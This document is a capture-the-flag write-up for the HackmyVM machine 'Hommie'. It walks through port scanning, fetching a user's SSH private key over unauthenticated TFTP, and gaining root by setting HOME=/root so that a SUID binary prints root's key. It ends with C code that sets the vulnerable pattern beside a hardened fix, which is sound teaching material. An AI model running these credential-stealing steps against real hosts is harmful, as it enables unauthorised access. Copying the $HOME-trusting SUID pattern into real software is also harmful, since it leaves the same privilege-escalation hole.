
HackmyVM-Hommie

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)
192.168.31.116 08:00:27:26:b1:6f PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)

The target is 192.168.31.116; scan all TCP ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.116 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:29 EST
Nmap scan report for hommie (192.168.31.116)
Host is up (0.00041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds

Port 80

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.116
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody

Directory brute-forcing on port 80 turns up nothing; the page only gives a hint that alexia's id_rsa has been exposed. Move on to port 21.

Port 21

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ftp anonymous@192.168.31.116
Connected to 192.168.31.116.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||35772|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||35347|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Jan 23 06:12 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> cd .web
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||27864|)
150 Here comes the directory listing.
-rw-r--r-- 1 106 113 35 Jan 23 06:12 1.phtml
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
-rw-r--r-- 1 106 113 5493 Jan 23 06:09 rev.php
226 Directory send OK.

Port 21 allows anonymous login and exposes a writable .web directory that maps onto the port-80 web root, so files can be dropped there, but the server does not execute PHP (the rev.php and 1.phtml test files in the listing are not parsed), so this route is a dead end.

tftp

Scan the UDP ports:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.116 --min-rate=1000 -sU --top-ports 20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:34 EST
Nmap scan report for hommie (192.168.31.116)
Host is up (0.00053s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

tftp shows as open|filtered, which for UDP only means nmap got no reply; the real confirmation is whether a transfer works. Combined with the hint from port 80, try fetching the key:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# tftp 192.168.31.116
tftp> get id_rsa

alexia's id_rsa comes down. tftp has no authentication and no directory listing, so the filename has to be guessed; here the port-80 hint gave it away.

SSH login

Log in as alexia with the downloaded key (ssh refuses a key file unless its permissions are restricted, so chmod 600 it first).

Privilege escalation

Look for SUID binaries:

alexia@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null
/opt/showMetheKey
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount

/opt/showMetheKey is not part of the stock SUID set, so it stands out; run it:

alexia@MiWiFi-RA71-srv:~$ /opt/showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
[key material omitted]
-----END OPENSSH PRIVATE KEY-----

It printed alexia's own id_rsa. Pull the binary down and open it in IDA:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0);                            // become root (binary is SUID root)
  setgid(0);
  system("cat $HOME/.ssh/id_rsa");      // $HOME comes from the caller's environment
  return 0;
}

It runs cat on $HOME/.ssh/id_rsa as root, with HOME taken straight from the environment: a SUID binary inheriting the caller's environment and then calling system(). Since the caller controls HOME, pointing it at /root makes the binary read root's key. (PATH and IFS are inherited by system() as well, so the cat itself could be hijacked; here changing HOME is enough.)

alexia@MiWiFi-RA71-srv:~$ export HOME=/root
alexia@MiWiFi-RA71-srv:/home/alexia$ env
SHELL=/bin/bash
PWD=/home/alexia
LOGNAME=alexia
XDG_SESSION_TYPE=tty
HOME=/root

Run it again with HOME=/root and it prints root's id_rsa; log in as root with that key.
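The bug in one place, as an added example that is not the challenge's binary or its source: the decompiled showMetheKey logic rebuilt as a C function beside a hardened version. Function names and the privilege-dropping check are my own; the hardened variant takes the home directory from getpwuid() on the real uid instead of $HOME, drops root before touching the file, and reads it directly instead of going through system().

```c
/* Added example: vulnerable path construction (trusting $HOME under SUID)
 * next to a hardened version. Not the code of the Hommie box. */
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Vulnerable: the path is built from whatever HOME the caller exported,
 * so `export HOME=/root` makes a SUID-root binary read root's key. The
 * original also used system(), which inherits PATH/IFS, so the `cat`
 * itself is attacker-controlled too. */
int key_path_from_env(char *buf, size_t n)
{
    const char *home = getenv("HOME");        /* attacker-controlled */
    if (home == NULL)
        return -1;
    int len = snprintf(buf, n, "%s/.ssh/id_rsa", home);
    return (len > 0 && (size_t)len < n) ? 0 : -1;
}

/* Hardened: the home directory comes from the passwd database for the
 * real uid, which the caller cannot change, so HOME/PATH/IFS in the
 * environment are irrelevant. */
int key_path_for_uid(uid_t real_uid, char *buf, size_t n)
{
    struct passwd *pw = getpwuid(real_uid);
    if (pw == NULL || pw->pw_dir == NULL || pw->pw_dir[0] != '/')
        return -1;
    int len = snprintf(buf, n, "%s/.ssh/id_rsa", pw->pw_dir);
    return (len > 0 && (size_t)len < n) ? 0 : -1;
}

/* Give up root for good before opening anything. Even with the right
 * path, a root-privileged open() would follow a symlink the caller planted
 * at ~/.ssh/id_rsa -> /root/.ssh/id_rsa; reading as the real uid closes
 * that hole. setuid() called with euid 0 sets real, effective and saved
 * uid, so root cannot be regained afterwards. */
int drop_to_real_uid(void)
{
    uid_t ruid = getuid();
    if (setuid(ruid) != 0)
        return -1;
    return (getuid() == ruid && geteuid() == ruid) ? 0 : -1;
}

/* Print the caller's own key: no shell, no environment lookups. */
int show_my_key(void)
{
    char path[4096];
    if (drop_to_real_uid() != 0 ||
        key_path_for_uid(getuid(), path, sizeof path) != 0)
        return -1;
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    char line[1024];
    while (fgets(line, sizeof line, f) != NULL)
        fputs(line, stdout);
    fclose(f);
    return 0;
}

int main(void)
{
    char path[4096];
    if (key_path_from_env(path, sizeof path) == 0)
        printf("vulnerable version would read: %s\n", path);
    if (key_path_for_uid(getuid(), path, sizeof path) == 0)
        printf("hardened version reads:        %s\n", path);
    return show_my_key() == 0 ? 0 : 1;
}
```

If an environment lookup in a setuid program really is unavoidable, glibc's secure_getenv() returns NULL whenever the process is running with elevated privileges and is the minimal patch; but the root cause here is that a SUID-root binary was given a job (printing the caller's own file) that needs no privilege at all.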